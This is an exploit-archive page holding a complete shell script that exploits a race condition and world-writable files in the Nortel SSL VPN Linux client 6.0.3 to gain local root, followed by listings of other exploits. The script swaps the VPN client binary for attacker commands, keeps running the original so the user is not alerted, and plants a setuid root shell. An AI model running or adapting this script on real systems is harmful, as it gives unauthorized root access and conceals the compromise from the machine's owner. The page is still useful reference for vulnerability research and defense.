Menu

Search for hundreds of thousands of exploits

"Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation"

Author

Exploit author

"Jon Hart"

Platform

Exploit platform

linux

Release date

Exploit published date

2007-02-21

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
#!/bin/sh
# 
# Nortel SSL VPN Linux Client race condition
# 
# Jon Hart <jhart@spoofed.org>
#
# The Linux client that is utilized by versions priot to  6.05 of the Nortel
# SSL VPN appliance suffers from a number of problems that, in combination,
# allow an unprivileged local user to obtain root privileges.
# 
# This particular bug is as follows:
# 1) SSL VPN is initiated from the startNetdirect() javascript call
# 2) A zip archive is downloaded to the local machine which contains three
#    binaries necessary for the client: askpass, client, and surun.  This
#    archive is written to /tmp, chmod'd 777, and then it is extracted into
#    /tmp/NetClient
# 3) All of these files are chmod'd world writable by the following java
#    snippet, which is called on all UNIX client OSs:
#
#   protected boolean setPermissions(String file)
#   {
#      String command = "chmod a+xw " + file;
#      try
#      {
#         Process p = Runtime.getRuntime().exec(command);
#         p.waitFor();
#      }
#      ...
#   }
#
# 4) /tmp/NetClient/surun is executed, which in turn runs
#    /tmp/NetClient/askpass.  This process aquires the root password, and
#    then executes /tmp/NetClient/client via /bin/su and the root password.  
#
# There is clearly a bug in step 2 and 3 whereby files are installed world
# writable.  The bug I chose to exploit is the race condition in step 4,
# combined with the insecure permissions of steps 2 and 3, which (IMO),
# gives root more easily.  The risk here is if you have untrusted accounts
# on the machine from which you access the Nortel VPN, those accounts can
# easily gain local root access.
#
# The exploit is fairly simple.  Wait for /tmp/NetClient/client to appear,
# swap it for our "special version", and wait for a shell.
#
# Notes: a /tmp with nosuid will help mitigate this particular _exploit_,
# but not the vulnerability.  The same vulnerability also exists in the Mac
# client.  
#
# For education and testing purposes only.  Only run this on systems that
# you maintain/control.
#

cleanup() {
   rm -f $TMP_DIR/.*-$$\..*
}


run_cmd() {
   CMD=$@    
   VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX`

   echo "Waiting for writable client"
   while (true); do
      if [ -w $CLIENT ]; then
         OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX`
         echo "Saving old client"
         cp $CLIENT $OLD_CLIENT 
         chmod 755 $OLD_CLIENT
         echo "Writing new \"client\""
         echo "#!/bin/sh" > $CLIENT 
         echo "$CMD" >> $CLIENT
         echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT
         # ensure the original client gets run so as to 
         # not alert the user
         echo "exec $OLD_CLIENT \$@" >> $CLIENT
         break
      fi
   done

   SUCCESS=0
   echo "Waiting for new client to be run"
   while (true); do
      if [ ! -f $VPN_CLIENT_RUN ]; then
         SUCCESS=1
         break
      else
         sleep 2
      fi
   done

   if [ $SUCCESS == 1 ]; then
      echo "Success"
      return 0
   else 
      echo "Exploit failed!"
      cleanup
      exit 1
   fi
}

suid_shell() {
   SH_C="sh_c-$$.c"

   # write out setuid shell
   cat >> $SH_C << EOF
   #include <sys/types.h>
   #include <unistd.h>
   int main (int argc, char **argv) {
      setuid(0);
      setgid(0);
      execl("/bin/bash", "bash", NULL);
   }
EOF

   # try like hell to get this shell compiled
   SH=`mktemp -t vpnshell-$$.XXXXXXXXXX`
   gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1
   if [ $? != 0 ]; then
      cc -o $SH $SH_C 2>&1 > /dev/null 2>&1
      if [ $? != 0 ]; then
         echo "Compilation of shell failed"
         echo "Trying backup method..."
         run_cmd "cp /bin/sh $SH && chmod 4755 $SH"
         while (true); do
            if [ -u $SH ]; then
               $SH 
               cleanup
               exit
            else
               sleep 1
            fi
         done
         echo "Failed"
         cleanup
         exit 1
      fi
   fi
   rm -f $SH_C 

   run_cmd "chown root:root $SH && chmod 4755 $SH"

   # wait for our shell to be chmod'd
   SUCCESS=0
   echo "Waiting for suid shell"
   for sleep in `seq 1 60`; do
      if [ -u $SH ]; then
         echo "Success! setuid shell is $SH"
         SUCCESS=1
         break
      else
         sleep 2
      fi
   done

   if [ $SUCCESS == 1 ]; then
      cleanup
      $SH
   else 
      rm -f $SH
      echo "Exploit failed!"
      cleanup
      exit 1
   fi
}

CLIENT="/tmp/NetClient/client"

if [ -f $CLIENT ]; then
   echo "client $CLIENT already exists -- forcing stop"
   $CLIENT --stop
   for sleep in `seq 1 60`; do
      if [ ! -f $CLIENT ]; then
         break
      fi
      sleep 1
   done
fi

# hack to figure out where temp files get put...
TMP_FILE=`mktemp -t $$`
TMP_DIR=`dirname $TMP_FILE`
rm -f $TMP_FILE

trap cleanup 1 2 3 15

# two modes of operation -- get a root shell, or run a cmd as root.
if [ -z "$1" ]; then
   suid_shell
else 
   run_cmd $1 
fi

cleanup

# milw0rm.com [2007-02-21]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2010-04-12 "TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities" webapps php "Jon Hart"
2007-03-23 "Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure" remote bsd "Jon Hart"
2007-03-23 "Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage" remote multiple "Jon Hart"
2007-02-21 "Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation" local linux "Jon Hart"
2006-07-20 "Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution" remote hardware "Jon Hart"
2006-07-19 "Cisco Security Monitoring Analysis and Response System JBoss - Command Execution" remote hardware "Jon Hart"
2004-05-31 "Linksys - DHCP Information Disclosure" remote hardware "Jon Hart"
2003-10-22 "Sun Management Center 3.0/3.5 - Error Message Information Disclosure" remote solaris "Jon Hart"
2003-09-09 "RealPlayer 9 *nix - Local Privilege Escalation" local linux "Jon Hart"
2003-09-09 "Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation" local linux "Jon Hart"
2003-09-09 "RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation" local linux "Jon Hart" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected